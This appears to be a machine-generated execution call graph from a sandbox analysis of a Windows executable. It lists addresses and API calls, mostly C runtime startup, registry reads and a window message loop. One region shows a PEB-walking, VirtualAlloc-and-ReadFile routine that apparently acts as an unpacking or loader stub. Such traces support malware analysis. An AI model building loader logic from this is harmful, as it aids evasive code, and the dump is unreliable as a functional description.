                                                                                  execution_graph 8821 4072c3 8822 4072cf __tsopen_nolock 8821->8822 8823 4072e7 8822->8823 8824 408bc0 _free 66 API calls 8822->8824 8826 4073d1 __tsopen_nolock 8822->8826 8825 4072f5 8823->8825 8827 408bc0 _free 66 API calls 8823->8827 8824->8823 8828 407303 8825->8828 8829 408bc0 _free 66 API calls 8825->8829 8827->8825 8830 407311 8828->8830 8832 408bc0 _free 66 API calls 8828->8832 8829->8828 8831 40731f 8830->8831 8833 408bc0 _free 66 API calls 8830->8833 8834 40732d 8831->8834 8835 408bc0 _free 66 API calls 8831->8835 8832->8830 8833->8831 8836 40733b 8834->8836 8837 408bc0 _free 66 API calls 8834->8837 8835->8834 8838 40734c 8836->8838 8840 408bc0 _free 66 API calls 8836->8840 8837->8836 8839 40a357 __lock 66 API calls 8838->8839 8841 407354 8839->8841 8840->8838 8842 407360 InterlockedDecrement 8841->8842 8843 407379 8841->8843 8842->8843 8844 40736b 8842->8844 8857 4073dd 8843->8857 8844->8843 8847 408bc0 _free 66 API calls 8844->8847 8847->8843 8848 40a357 __lock 66 API calls 8849 40738d 8848->8849 8850 4073be 8849->8850 8852 40878f ___removelocaleref 8 API calls 8849->8852 8860 4073e9 8850->8860 8855 4073a2 8852->8855 8854 408bc0 _free 66 API calls 8854->8826 8855->8850 8856 408828 ___freetlocinfo 66 API calls 8855->8856 8856->8850 8863 40a27e LeaveCriticalSection 8857->8863 8859 407386 8859->8848 8864 40a27e LeaveCriticalSection 8860->8864 8862 4073cb 8862->8854 8863->8859 8864->8862 9368 40588f 9375 406097 9368->9375 9371 4058a2 9373 408bc0 _free 66 API calls 9371->9373 9374 4058ad 9373->9374 9388 405fbd 9375->9388 9377 405894 9377->9371 9378 40a141 9377->9378 9379 40a14d __tsopen_nolock 9378->9379 9380 40a357 __lock 66 API calls 9379->9380 9387 40a159 9380->9387 9381 40a1bf 9418 40a1d4 9381->9418 9383 40a1cb __tsopen_nolock 9383->9371 9385 40a194 DeleteCriticalSection 9386 408bc0 _free 66 API calls 9385->9386 9386->9387 9387->9381 9387->9385 9405 40e7bf 9387->9405 9389 405fc9 __tsopen_nolock 9388->9389 9390 40a357 __lock 66 API calls 9389->9390 9397 405fd8 9390->9397 9391 406070 9401 40608e 9391->9401 9393 4058f0 _flsall 67 API calls 9393->9397 9394 40607c __tsopen_nolock 9394->9377 9396 405f75 101 API calls __fflush_nolock 9396->9397 9397->9391 9397->9393 9397->9396 9398 40605f 9397->9398 9399 40595e __wfsopen 2 API calls 9398->9399 9400 40606d 9399->9400 9400->9397 9404 40a27e LeaveCriticalSection 9401->9404 9403 406095 9403->9394 9404->9403 9406 40e7cb __tsopen_nolock 9405->9406 9407 40e7f2 9406->9407 9408 40e7dd 9406->9408 9410 4058af __lock_file 67 API calls 9407->9410 9416 40e7ed __tsopen_nolock 9407->9416 9409 40370a __vswprintf_helper 66 API calls 9408->9409 9411 40e7e2 9409->9411 9412 40e80b 9410->9412 9413 4036b8 __vswprintf_helper 11 API calls 9411->9413 9421 40e752 9412->9421 9413->9416 9416->9387 9471 40a27e LeaveCriticalSection 9418->9471 9420 40a1db 9420->9383 9422 40e763 9421->9422 9423 40e777 9421->9423 9424 40370a __vswprintf_helper 66 API calls 9422->9424 9425 405f0d __flush 97 API calls 9423->9425 9427 40e773 9423->9427 9426 40e768 9424->9426 9428 40e783 9425->9428 9429 4036b8 __vswprintf_helper 11 API calls 9426->9429 9437 40e82b 9427->9437 9440 40f116 9428->9440 9429->9427 9432 40573d __flush 66 API calls 9433 40e791 9432->9433 9444 40ea85 9433->9444 9435 40e797 9435->9427 9436 408bc0 _free 66 API calls 9435->9436 9436->9427 9438 405922 __wfsopen 2 API calls 9437->9438 9439 40e831 9438->9439 9439->9416 9441 40e78b 9440->9441 9442 40f126 9440->9442 9441->9432 9442->9441 9443 408bc0 _free 66 API calls 9442->9443 9443->9441 9445 40ea91 __tsopen_nolock 9444->9445 9446 40eab4 9445->9446 9447 40ea99 9445->9447 9448 40eac0 9446->9448 9453 40eafa 9446->9453 9449 40371d __chsize_nolock 66 API calls 9447->9449 9450 40371d __chsize_nolock 66 API calls 9448->9450 9451 40ea9e 9449->9451 9452 40eac5 9450->9452 9454 40370a __vswprintf_helper 66 API calls 9451->9454 9455 40370a __vswprintf_helper 66 API calls 9452->9455 9456 409b77 ___lock_fhandle 68 API calls 9453->9456 9465 40eaa6 __tsopen_nolock 9454->9465 9457 40eacd 9455->9457 9458 40eb00 9456->9458 9459 4036b8 __vswprintf_helper 11 API calls 9457->9459 9460 40eb1a 9458->9460 9461 40eb0e 9458->9461 9459->9465 9462 40370a __vswprintf_helper 66 API calls 9460->9462 9463 40e9e9 __close_nolock 69 API calls 9461->9463 9464 40eb14 9462->9464 9463->9464 9467 40eb41 9464->9467 9465->9435 9470 409c16 LeaveCriticalSection 9467->9470 9469 40eb47 9469->9465 9470->9469 9471->9420 7164 403253 7202 405990 7164->7202 7166 40325f GetStartupInfoW 7167 403273 HeapSetInformation 7166->7167 7169 40327e 7166->7169 7167->7169 7203 40756d HeapCreate 7169->7203 7170 4032cc 7171 4032d7 7170->7171 7308 40322a 7170->7308 7204 4073f2 GetModuleHandleW 7171->7204 7174 4032dd 7175 40322a _fast_error_exit 66 API calls 7174->7175 7176 4032e8 __RTC_Initialize 7174->7176 7175->7176 7229 405b7f GetStartupInfoW 7176->7229 7179 403302 GetCommandLineW 7242 407055 GetEnvironmentStringsW 7179->7242 7182 403312 7248 406fa7 GetModuleFileNameW 7182->7248 7185 40331c 7186 403327 7185->7186 7187 4069b9 __amsg_exit 66 API calls 7185->7187 7252 406d75 7186->7252 7187->7186 7189 40332d 7190 403338 7189->7190 7191 4069b9 __amsg_exit 66 API calls 7189->7191 7266 406798 7190->7266 7191->7190 7193 403340 7194 4069b9 __amsg_exit 66 API calls 7193->7194 7195 40334b __wwincmdln 7193->7195 7194->7195 7272 402571 6 API calls 7195->7272 7198 40337b 7326 40699b 7198->7326 7201 403380 __tsopen_nolock 7202->7166 7203->7170 7205 407406 7204->7205 7206 40740f GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7204->7206 7329 40713f 7205->7329 7208 407459 TlsAlloc 7206->7208 7211 4074a7 TlsSetValue 7208->7211 7212 407568 7208->7212 7211->7212 7213 4074b8 7211->7213 7212->7174 7339 406741 7213->7339 7218 407500 DecodePointer 7221 407515 7218->7221 7219 407563 7220 40713f __mtterm 70 API calls 7219->7220 7220->7212 7221->7219 7348 408c3f 7221->7348 7224 407533 DecodePointer 7225 407544 7224->7225 7225->7219 7226 407548 7225->7226 7354 40717c 7226->7354 7228 407550 GetCurrentThreadId 7228->7212 7230 408c3f __calloc_crt 66 API calls 7229->7230 7240 405b9d 7230->7240 7231 405d48 GetStdHandle 7237 405d12 7231->7237 7232 408c3f __calloc_crt 66 API calls 7232->7240 7233 405dac SetHandleCount 7235 4032f6 7233->7235 7234 405c92 7234->7237 7238 405cc9 InitializeCriticalSectionAndSpinCount 7234->7238 7239 405cbe GetFileType 7234->7239 7235->7179 7316 4069b9 7235->7316 7236 405d5a GetFileType 7236->7237 7237->7231 7237->7233 7237->7236 7241 405d80 InitializeCriticalSectionAndSpinCount 7237->7241 7238->7234 7238->7235 7239->7234 7239->7238 7240->7232 7240->7234 7240->7235 7240->7237 7241->7235 7241->7237 7243 407066 7242->7243 7244 40706a 7242->7244 7243->7182 7245 408bfa __malloc_crt 66 API calls 7244->7245 7246 40708c _memmove 7245->7246 7247 407093 FreeEnvironmentStringsW 7246->7247 7247->7182 7249 406fdc _wparse_cmdline 7248->7249 7250 408bfa __malloc_crt 66 API calls 7249->7250 7251 40701f _wparse_cmdline 7249->7251 7250->7251 7251->7185 7253 406d8d _wcslen 7252->7253 7257 406d85 7252->7257 7254 408c3f __calloc_crt 66 API calls 7253->7254 7259 406db1 _wcslen 7254->7259 7255 406e07 7256 408bc0 _free 66 API calls 7255->7256 7256->7257 7257->7189 7258 408c3f __calloc_crt 66 API calls 7258->7259 7259->7255 7259->7257 7259->7258 7260 406e2d 7259->7260 7262 40b76e __wsetenvp 66 API calls 7259->7262 7263 406e44 7259->7263 7261 408bc0 _free 66 API calls 7260->7261 7261->7257 7262->7259 7264 403666 __invoke_watson 10 API calls 7263->7264 7265 406e50 7264->7265 7265->7189 7268 4067a6 __IsNonwritableInCurrentImage 7266->7268 7598 404f13 7268->7598 7269 4067c4 __initterm_e 7271 4067e5 __IsNonwritableInCurrentImage 7269->7271 7601 40b48e 7269->7601 7271->7193 7273 4025bb Sleep 7272->7273 7274 4025c8 7273->7274 7275 402643 RegisterWindowMessageW 7274->7275 7666 40318f 7274->7666 7276 402664 _memset 7275->7276 7716 4014ec GetSystemMetrics GetSystemMetrics 7276->7716 7281 402674 _memset 7284 402682 6 API calls 7281->7284 7282 4025eb 7682 402f66 7282->7682 7286 402708 MonitorFromRect GetMonitorInfoW 7284->7286 7302 402701 7284->7302 7285 4025f1 7287 403055 _fseek 101 API calls 7285->7287 7291 402748 CreateWindowExW 7286->7291 7288 4025fb VirtualAlloc 7287->7288 7695 402db5 7288->7695 7293 4027a2 7291->7293 7294 402795 ExitProcess 7291->7294 7778 401abc 13 API calls 7293->7778 7297 4027a7 ShowWindow UpdateWindow DragAcceptFiles GetCommandLineW 7779 401f93 7297->7779 7301 402835 GetMessageW 7301->7302 7303 4027f8 IsDialogMessageW 7301->7303 7302->7198 7323 40696f 7302->7323 7303->7301 7304 40280c TranslateAcceleratorW 7303->7304 7304->7301 7305 402821 TranslateMessage DispatchMessageW 7304->7305 7305->7301 7309 403238 7308->7309 7310 40323d 7308->7310 7311 406bac __FF_MSGBANNER 66 API calls 7309->7311 7312 4069fd __NMSG_WRITE 66 API calls 7310->7312 7311->7310 7313 403245 7312->7313 7314 406717 _doexit 3 API calls 7313->7314 7315 40324f 7314->7315 7315->7171 7317 406bac __FF_MSGBANNER 66 API calls 7316->7317 7318 4069c3 7317->7318 7319 4069fd __NMSG_WRITE 66 API calls 7318->7319 7320 4069cb 7319->7320 8780 406985 7320->8780 7324 40682f _doexit 66 API calls 7323->7324 7325 406980 7324->7325 7325->7198 7327 40682f _doexit 66 API calls 7326->7327 7328 4069a6 7327->7328 7328->7201 7330 407149 DecodePointer 7329->7330 7331 407158 7329->7331 7330->7331 7332 407169 TlsFree 7331->7332 7336 407177 7331->7336 7332->7336 7333 40a243 DeleteCriticalSection 7367 408bc0 7333->7367 7334 40a25b 7337 40a26d DeleteCriticalSection 7334->7337 7338 40740b 7334->7338 7336->7333 7336->7334 7337->7334 7338->7174 7393 4070f9 RtlEncodePointer 7339->7393 7341 406749 __init_pointers __initp_misc_winsig 7394 40b100 EncodePointer 7341->7394 7343 40676f EncodePointer EncodePointer EncodePointer EncodePointer 7344 40a1dd 7343->7344 7345 40a1e8 7344->7345 7346 40a1f2 InitializeCriticalSectionAndSpinCount 7345->7346 7347 4074fc 7345->7347 7346->7345 7346->7347 7347->7218 7347->7219 7351 408c48 7348->7351 7350 40752b 7350->7219 7350->7224 7351->7350 7352 408c66 Sleep 7351->7352 7395 40c55d 7351->7395 7353 408c7b 7352->7353 7353->7350 7353->7351 7406 405990 7354->7406 7356 407188 GetModuleHandleW 7407 40a357 7356->7407 7358 4071c6 InterlockedIncrement 7414 40721e 7358->7414 7361 40a357 __lock 64 API calls 7362 4071e7 7361->7362 7417 408700 InterlockedIncrement 7362->7417 7364 407205 7429 407227 7364->7429 7366 407212 __tsopen_nolock 7366->7228 7368 408bcb HeapFree 7367->7368 7372 408bf4 __dosmaperr 7367->7372 7369 408be0 7368->7369 7368->7372 7373 40370a 7369->7373 7372->7336 7376 407230 GetLastError 7373->7376 7375 40370f GetLastError 7375->7372 7390 40710b TlsGetValue 7376->7390 7379 40729d SetLastError 7379->7375 7380 408c3f __calloc_crt 62 API calls 7381 40725b 7380->7381 7381->7379 7382 407263 DecodePointer 7381->7382 7383 407278 7382->7383 7384 407294 7383->7384 7385 40727c 7383->7385 7387 408bc0 _free 62 API calls 7384->7387 7386 40717c __getptd_noexit 62 API calls 7385->7386 7389 407284 GetCurrentThreadId 7386->7389 7388 40729a 7387->7388 7388->7379 7389->7379 7391 407120 DecodePointer TlsSetValue 7390->7391 7392 40713b 7390->7392 7391->7392 7392->7379 7392->7380 7393->7341 7394->7343 7396 40c569 7395->7396 7398 40c584 7395->7398 7397 40c575 7396->7397 7396->7398 7399 40370a __vswprintf_helper 65 API calls 7397->7399 7400 40c597 RtlAllocateHeap 7398->7400 7401 40c5be 7398->7401 7404 40b343 DecodePointer 7398->7404 7402 40c57a 7399->7402 7400->7398 7400->7401 7401->7351 7402->7351 7405 40b358 7404->7405 7405->7398 7406->7356 7408 40a36c 7407->7408 7409 40a37f EnterCriticalSection 7407->7409 7432 40a295 7408->7432 7409->7358 7411 40a372 7411->7409 7412 4069b9 __amsg_exit 65 API calls 7411->7412 7413 40a37e 7412->7413 7413->7409 7596 40a27e LeaveCriticalSection 7414->7596 7416 4071e0 7416->7361 7418 408721 7417->7418 7419 40871e InterlockedIncrement 7417->7419 7420 40872b InterlockedIncrement 7418->7420 7421 40872e 7418->7421 7419->7418 7420->7421 7422 408738 InterlockedIncrement 7421->7422 7423 40873b 7421->7423 7422->7423 7424 408745 InterlockedIncrement 7423->7424 7425 408748 7423->7425 7424->7425 7426 408761 InterlockedIncrement 7425->7426 7427 408771 InterlockedIncrement 7425->7427 7428 40877c InterlockedIncrement 7425->7428 7426->7425 7427->7425 7428->7364 7597 40a27e LeaveCriticalSection 7429->7597 7431 40722e 7431->7366 7433 40a2a1 __tsopen_nolock 7432->7433 7434 40a2b1 7433->7434 7435 40a2c9 7433->7435 7459 406bac 7434->7459 7444 40a2d7 __tsopen_nolock 7435->7444 7495 408bfa 7435->7495 7442 40a2f8 7447 40a357 __lock 65 API calls 7442->7447 7443 40a2e9 7446 40370a __vswprintf_helper 65 API calls 7443->7446 7444->7411 7446->7444 7449 40a2ff 7447->7449 7450 40a332 7449->7450 7451 40a307 InitializeCriticalSectionAndSpinCount 7449->7451 7453 408bc0 _free 65 API calls 7450->7453 7452 40a317 7451->7452 7458 40a323 7451->7458 7454 408bc0 _free 65 API calls 7452->7454 7453->7458 7455 40a31d 7454->7455 7457 40370a __vswprintf_helper 65 API calls 7455->7457 7457->7458 7501 40a34e 7458->7501 7504 40b7d1 7459->7504 7461 406bb3 7462 406bc0 7461->7462 7463 40b7d1 __NMSG_WRITE 66 API calls 7461->7463 7464 4069fd __NMSG_WRITE 66 API calls 7462->7464 7467 406be2 7462->7467 7463->7462 7465 406bd8 7464->7465 7466 4069fd __NMSG_WRITE 66 API calls 7465->7466 7466->7467 7468 4069fd 7467->7468 7469 406a1e __NMSG_WRITE 7468->7469 7470 40b7d1 __NMSG_WRITE 63 API calls 7469->7470 7491 406b3a 7469->7491 7472 406a38 7470->7472 7474 406b49 GetStdHandle 7472->7474 7475 40b7d1 __NMSG_WRITE 63 API calls 7472->7475 7473 406baa 7492 406717 7473->7492 7479 406b57 _strlen 7474->7479 7474->7491 7477 406a49 7475->7477 7476 406a5b 7476->7491 7529 40b76e 7476->7529 7477->7474 7477->7476 7481 406b8d WriteFile 7479->7481 7479->7491 7481->7491 7482 406a87 GetModuleFileNameW 7483 406aa8 7482->7483 7488 406ab4 _wcslen 7482->7488 7485 40b76e __wsetenvp 63 API calls 7483->7485 7484 403666 __invoke_watson 10 API calls 7484->7488 7485->7488 7486 40b611 63 API calls __NMSG_WRITE 7486->7488 7488->7484 7488->7486 7489 406b2a 7488->7489 7538 40b686 7488->7538 7547 40b4a5 7489->7547 7565 40800d 7491->7565 7575 4066ec GetModuleHandleW 7492->7575 7497 408c03 7495->7497 7498 408c39 7497->7498 7499 408c1a Sleep 7497->7499 7578 40c4c9 7497->7578 7498->7442 7498->7443 7500 408c2f 7499->7500 7500->7497 7500->7498 7595 40a27e LeaveCriticalSection 7501->7595 7503 40a355 7503->7444 7505 40b7dd 7504->7505 7506 40b7e7 7505->7506 7507 40370a __vswprintf_helper 66 API calls 7505->7507 7506->7461 7508 40b800 7507->7508 7511 4036b8 7508->7511 7514 40368b DecodePointer 7511->7514 7515 4036a0 7514->7515 7520 403666 7515->7520 7517 4036b7 7518 40368b __vswprintf_helper 10 API calls 7517->7518 7519 4036c4 7518->7519 7519->7461 7523 40353d 7520->7523 7524 40355c _memset __call_reportfault 7523->7524 7525 40357a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7524->7525 7528 403648 __call_reportfault 7525->7528 7526 40800d __atodbl_l 5 API calls 7527 403664 GetCurrentProcess TerminateProcess 7526->7527 7527->7517 7528->7526 7530 40b783 7529->7530 7531 40b77c 7529->7531 7532 40370a __vswprintf_helper 66 API calls 7530->7532 7531->7530 7535 40b7a4 7531->7535 7537 40b788 7532->7537 7533 4036b8 __vswprintf_helper 11 API calls 7534 406a7c 7533->7534 7534->7482 7534->7488 7535->7534 7536 40370a __vswprintf_helper 66 API calls 7535->7536 7536->7537 7537->7533 7543 40b698 7538->7543 7539 40b69c 7540 40370a __vswprintf_helper 66 API calls 7539->7540 7541 40b6a1 7539->7541 7542 40b6b8 7540->7542 7541->7488 7544 4036b8 __vswprintf_helper 11 API calls 7542->7544 7543->7539 7543->7541 7545 40b6df 7543->7545 7544->7541 7545->7541 7546 40370a __vswprintf_helper 66 API calls 7545->7546 7546->7542 7573 4070f9 RtlEncodePointer 7547->7573 7549 40b4cb 7550 40b558 7549->7550 7551 40b4db LoadLibraryW 7549->7551 7552 40b585 7550->7552 7556 40b572 DecodePointer DecodePointer 7550->7556 7553 40b5f0 7551->7553 7554 40b4f0 GetProcAddress 7551->7554 7557 40b5e4 DecodePointer 7552->7557 7558 40b5bb DecodePointer 7552->7558 7564 40b5a8 7552->7564 7561 40800d __atodbl_l 5 API calls 7553->7561 7554->7553 7555 40b506 7 API calls 7554->7555 7555->7550 7560 40b548 GetProcAddress EncodePointer 7555->7560 7556->7552 7557->7553 7558->7557 7559 40b5c2 7558->7559 7559->7557 7563 40b5d5 DecodePointer 7559->7563 7560->7550 7562 40b60f 7561->7562 7562->7491 7563->7557 7563->7564 7564->7557 7566 408015 7565->7566 7567 408017 IsDebuggerPresent 7565->7567 7566->7473 7574 408005 7567->7574 7570 40b958 SetUnhandledExceptionFilter UnhandledExceptionFilter 7571 40b975 __call_reportfault 7570->7571 7572 40b97d GetCurrentProcess TerminateProcess 7570->7572 7571->7572 7572->7473 7573->7549 7574->7570 7576 406700 GetProcAddress 7575->7576 7577 406710 ExitProcess 7575->7577 7576->7577 7579 40c546 7578->7579 7587 40c4d7 7578->7587 7580 40b343 _malloc DecodePointer 7579->7580 7581 40c54c 7580->7581 7583 40370a __vswprintf_helper 65 API calls 7581->7583 7582 406bac __FF_MSGBANNER 65 API calls 7588 40c4e2 7582->7588 7594 40c53e 7583->7594 7584 40c505 RtlAllocateHeap 7584->7587 7584->7594 7585 4069fd __NMSG_WRITE 65 API calls 7585->7588 7586 40c532 7590 40370a __vswprintf_helper 65 API calls 7586->7590 7587->7584 7587->7586 7587->7588 7589 40b343 _malloc DecodePointer 7587->7589 7592 40c530 7587->7592 7588->7582 7588->7585 7588->7587 7591 406717 _doexit 3 API calls 7588->7591 7589->7587 7590->7592 7591->7588 7593 40370a __vswprintf_helper 65 API calls 7592->7593 7593->7594 7594->7497 7595->7503 7596->7416 7597->7431 7599 404f19 EncodePointer 7598->7599 7599->7599 7600 404f33 7599->7600 7600->7269 7604 40b452 7601->7604 7603 40b49b 7603->7271 7605 40b45e __tsopen_nolock 7604->7605 7612 40672f 7605->7612 7611 40b47f __tsopen_nolock 7611->7603 7613 40a357 __lock 66 API calls 7612->7613 7614 406736 7613->7614 7615 40b36b DecodePointer DecodePointer 7614->7615 7616 40b399 7615->7616 7617 40b41a 7615->7617 7616->7617 7629 40ed04 7616->7629 7626 40b488 7617->7626 7619 40b3fd EncodePointer EncodePointer 7619->7617 7620 40b3ab 7620->7619 7622 40b3cf 7620->7622 7636 408c8b 7620->7636 7622->7617 7623 408c8b __realloc_crt 70 API calls 7622->7623 7624 40b3eb EncodePointer 7622->7624 7625 40b3e5 7623->7625 7624->7619 7625->7617 7625->7624 7662 406738 7626->7662 7630 40ed24 HeapSize 7629->7630 7631 40ed0f 7629->7631 7630->7620 7632 40370a __vswprintf_helper 66 API calls 7631->7632 7633 40ed14 7632->7633 7634 4036b8 __vswprintf_helper 11 API calls 7633->7634 7635 40ed1f 7634->7635 7635->7620 7639 408c94 7636->7639 7638 408cd3 7638->7622 7639->7638 7640 408cb4 Sleep 7639->7640 7641 40c5df 7639->7641 7640->7639 7642 40c5f5 7641->7642 7643 40c5ea 7641->7643 7645 40c5fd 7642->7645 7650 40c60a 7642->7650 7644 40c4c9 _malloc 66 API calls 7643->7644 7646 40c5f2 7644->7646 7647 408bc0 _free 66 API calls 7645->7647 7646->7639 7659 40c605 __dosmaperr 7647->7659 7648 40c642 7649 40b343 _malloc DecodePointer 7648->7649 7652 40c648 7649->7652 7650->7648 7651 40c612 HeapReAlloc 7650->7651 7653 40c672 7650->7653 7655 40b343 _malloc DecodePointer 7650->7655 7658 40c65a 7650->7658 7651->7650 7651->7659 7654 40370a __vswprintf_helper 66 API calls 7652->7654 7656 40370a __vswprintf_helper 66 API calls 7653->7656 7654->7659 7655->7650 7657 40c677 GetLastError 7656->7657 7657->7659 7660 40370a __vswprintf_helper 66 API calls 7658->7660 7659->7639 7661 40c65f GetLastError 7660->7661 7661->7659 7665 40a27e LeaveCriticalSection 7662->7665 7664 40673f 7664->7611 7665->7664 7794 4030d1 7666->7794 7668 4025e0 7669 403055 7668->7669 7670 403061 __tsopen_nolock 7669->7670 7671 40306d 7670->7671 7673 403093 7670->7673 7672 40370a __vswprintf_helper 66 API calls 7671->7672 7674 403072 7672->7674 8444 4058af 7673->8444 7676 4036b8 __vswprintf_helper 11 API calls 7674->7676 7681 40307d __tsopen_nolock 7676->7681 7681->7282 7683 402f72 __tsopen_nolock 7682->7683 7684 402f93 7683->7684 7685 402f7e 7683->7685 7686 4058af __lock_file 67 API calls 7684->7686 7687 40370a __vswprintf_helper 66 API calls 7685->7687 7688 402f9b 7686->7688 7689 402f83 7687->7689 7690 402dd2 __ftell_nolock 71 API calls 7688->7690 7691 4036b8 __vswprintf_helper 11 API calls 7689->7691 7692 402fa8 7690->7692 7694 402f8e __tsopen_nolock 7691->7694 8524 402fc1 7692->8524 7694->7285 8527 402d27 7695->8527 7697 402617 7698 481254 7697->7698 7703 480f9c 7697->7703 7701 48125b 7698->7701 7699 481267 7699->7275 7701->7699 7702 481630 ExitProcess 7701->7702 8623 4808ef 7701->8623 8711 48005f GetPEB 7703->8711 7705 481105 8712 480f1d 7705->8712 7707 4811bb 7707->7275 7708 48110d 7708->7707 8725 480422 7708->8725 7711 481218 VirtualAlloc ReadFile 7711->7707 7714 48124e 7711->7714 7712 481267 7712->7275 7713 4808ef 15 API calls 7713->7714 7714->7712 7714->7713 7715 481630 ExitProcess 7714->7715 7717 401511 GetSystemMetrics 7716->7717 8771 402ac0 7717->8771 7721 401610 RegQueryValueExW 7723 401644 RegQueryValueExW 7721->7723 7724 401637 7721->7724 7722 401ab7 7722->7281 7725 401662 7723->7725 7726 40166f RegQueryValueExW 7723->7726 7724->7723 7725->7726 7727 40169a RegQueryValueExW 7726->7727 7728 40168d 7726->7728 7729 4016c3 RegQueryValueExW 7727->7729 7730 4016b8 7727->7730 7728->7727 7731 4016e1 7729->7731 7732 4016ec RegQueryValueExW 7729->7732 7730->7729 7731->7732 7733 401717 RegQueryValueExW 7732->7733 7734 40170a 7732->7734 7735 401742 RegQueryValueExW 7733->7735 7736 401735 7733->7736 7734->7733 7737 401760 7735->7737 7738 40176d RegQueryValueExW 7735->7738 7736->7735 7737->7738 7739 401798 RegQueryValueExW 7738->7739 7740 40178b 7738->7740 7741 4017c3 RegQueryValueExW 7739->7741 7742 4017b6 7739->7742 7740->7739 7743 4017e1 7741->7743 7744 4017ee RegQueryValueExW 7741->7744 7742->7741 7743->7744 7745 401819 RegQueryValueExW 7744->7745 7746 40180c 7744->7746 7747 401844 RegQueryValueExW 7745->7747 7748 401837 7745->7748 7746->7745 7749 401862 7747->7749 7750 40186f RegQueryValueExW 7747->7750 7748->7747 7749->7750 7751 40189a RegQueryValueExW 7750->7751 7752 40188d 7750->7752 7753 4018c5 RegQueryValueExW 7751->7753 7754 4018b8 7751->7754 7752->7751 7755 4018f0 RegQueryValueExW 7753->7755 7756 4018e3 7753->7756 7754->7753 7757 40191b RegQueryValueExW 7755->7757 7758 40190e 7755->7758 7756->7755 7759 401946 RegQueryValueExW 7757->7759 7760 401939 7757->7760 7758->7757 7761 401971 RegQueryValueExW 7759->7761 7762 401964 7759->7762 7760->7759 7763 40199c RegQueryValueExW 7761->7763 7764 40198f 7761->7764 7762->7761 7765 4019d4 7763->7765 7766 4019fa RegQueryValueExW 7763->7766 7764->7763 7765->7766 8773 401051 RegOpenKeyW 7765->8773 7767 401a37 RegQueryValueExW 7766->7767 7768 401a1f 7766->7768 7770 401a75 RegQueryValueExW 7767->7770 7771 401a5d 7767->7771 7768->7767 7769 401a25 lstrcpyW 7768->7769 7769->7767 7774 401a96 7770->7774 7775 401aae RegCloseKey 7770->7775 7771->7770 7773 401a63 lstrcpyW 7771->7773 7773->7770 7774->7775 7777 401a9c lstrcpyW 7774->7777 7775->7722 7777->7775 7778->7297 7781 401fad 7779->7781 7780 4020c5 LoadAcceleratorsW 7780->7301 7781->7780 7782 402066 lstrlenW lstrcpynW lstrcatW 7781->7782 7783 4020a8 InvalidateRect 7781->7783 7784 4020a4 7782->7784 7783->7780 7784->7783 7786 4020cc 7784->7786 8778 401f1c LoadStringW wsprintfW LoadStringW MessageBoxW 7786->8778 7788 4020d8 7789 4020dc 7788->7789 7790 40211f DestroyWindow 7788->7790 7789->7780 8779 40101c lstrcpyW GetFileTitleW 7789->8779 7790->7780 7792 4020f0 CreateFileW 7792->7780 7793 402111 CloseHandle 7792->7793 7793->7780 7797 4030dd __tsopen_nolock 7794->7797 7795 4030f0 7796 40370a __vswprintf_helper 66 API calls 7795->7796 7798 4030f5 7796->7798 7797->7795 7799 40311e 7797->7799 7800 4036b8 __vswprintf_helper 11 API calls 7798->7800 7813 406359 7799->7813 7810 403100 __tsopen_nolock @_EH4_CallFilterFunc@8 7800->7810 7802 403123 7803 403137 7802->7803 7804 40312a 7802->7804 7806 40315f 7803->7806 7807 40313f 7803->7807 7805 40370a __vswprintf_helper 66 API calls 7804->7805 7805->7810 7830 4060a0 7806->7830 7808 40370a __vswprintf_helper 66 API calls 7807->7808 7808->7810 7810->7668 7814 406365 __tsopen_nolock 7813->7814 7815 40a357 __lock 66 API calls 7814->7815 7828 406373 7815->7828 7816 4063e8 7853 406483 7816->7853 7817 4063ef 7818 408bfa __malloc_crt 66 API calls 7817->7818 7820 4063f6 7818->7820 7820->7816 7822 406404 InitializeCriticalSectionAndSpinCount 7820->7822 7821 406478 __tsopen_nolock 7821->7802 7823 406424 7822->7823 7824 406437 EnterCriticalSection 7822->7824 7827 408bc0 _free 66 API calls 7823->7827 7824->7816 7825 40a295 __mtinitlocknum 66 API calls 7825->7828 7827->7816 7828->7816 7828->7817 7828->7825 7856 4058f0 7828->7856 7861 40595e 7828->7861 7831 4060c2 7830->7831 7832 4060dd 7831->7832 7844 4060f4 __wopenfile 7831->7844 7834 40370a __vswprintf_helper 66 API calls 7832->7834 7833 4062a9 7837 406302 7833->7837 7838 406314 7833->7838 7835 4060e2 7834->7835 7836 4036b8 __vswprintf_helper 11 API calls 7835->7836 7842 40316a 7836->7842 7839 40370a __vswprintf_helper 66 API calls 7837->7839 7868 40adae 7838->7868 7841 406307 7839->7841 7843 4036b8 __vswprintf_helper 11 API calls 7841->7843 7850 403185 7842->7850 7843->7842 7844->7833 7844->7837 7844->7844 7871 40aeb3 7844->7871 7847 40aeb3 __wcsnicmp 78 API calls 7848 4062c1 7847->7848 7848->7833 7849 40aeb3 __wcsnicmp 78 API calls 7848->7849 7849->7833 8437 405922 7850->8437 7852 40318d 7852->7810 7866 40a27e LeaveCriticalSection 7853->7866 7855 40648a 7855->7821 7857 405913 EnterCriticalSection 7856->7857 7858 4058fd 7856->7858 7857->7828 7859 40a357 __lock 66 API calls 7858->7859 7860 405906 7859->7860 7860->7828 7862 405981 LeaveCriticalSection 7861->7862 7863 40596e 7861->7863 7862->7828 7867 40a27e LeaveCriticalSection 7863->7867 7865 40597e 7865->7828 7866->7855 7867->7865 7879 40acea 7868->7879 7870 40adc9 7870->7842 7872 40af3b 7871->7872 7874 40aec2 7871->7874 8327 40adce 7872->8327 7875 40370a __vswprintf_helper 66 API calls 7874->7875 7877 4062a2 7874->7877 7876 40aed9 7875->7876 7878 4036b8 __vswprintf_helper 11 API calls 7876->7878 7877->7833 7877->7847 7878->7877 7881 40acf6 __tsopen_nolock 7879->7881 7880 40ad09 7882 40370a __vswprintf_helper 66 API calls 7880->7882 7881->7880 7883 40ad3f 7881->7883 7884 40ad0e 7882->7884 7890 40a5b5 7883->7890 7886 4036b8 __vswprintf_helper 11 API calls 7884->7886 7887 40ad18 __tsopen_nolock 7886->7887 7887->7870 7888 40ad59 7997 40ad80 7888->7997 7891 40a5dc 7890->7891 8001 40ec04 7891->8001 7893 403666 __invoke_watson 10 API calls 7897 40ace9 __tsopen_nolock 7893->7897 7894 40a692 7907 40a719 7894->7907 7916 40a6ec 7894->7916 7895 40a637 8026 40371d 7895->8026 7900 40ad09 7897->7900 7903 40ad3f 7897->7903 7898 40a5f8 7898->7894 7898->7895 7943 40a867 7898->7943 7902 40370a __vswprintf_helper 66 API calls 7900->7902 7901 40370a 